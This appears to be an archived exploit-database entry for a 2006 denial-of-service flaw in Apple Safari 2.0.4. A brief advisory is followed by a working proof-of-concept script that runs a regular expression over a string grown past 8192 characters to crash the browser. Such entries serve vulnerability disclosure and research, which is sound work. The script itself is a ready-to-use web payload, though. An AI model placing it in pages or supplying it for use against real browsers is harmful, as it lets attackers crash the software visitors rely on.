Apple Safari 2.0.4 - JavaScript Regular Expression Match Remote Denial of Service

EDB-ID:

29007


Author:

jbh_cg

Type:

dos


Platform:

OSX

Date:

2006-11-14


source: https://www.securityfocus.com/bid/21053/info

Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code.

An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed.

Apple Safari 2.0.4 is vulnerable to this issue; other versions may also be affected.

<script> var reg = /(.)*/; var z = 'Z'; while (z.length <= 8192) z+=z; var boum = reg.exec(z); </script>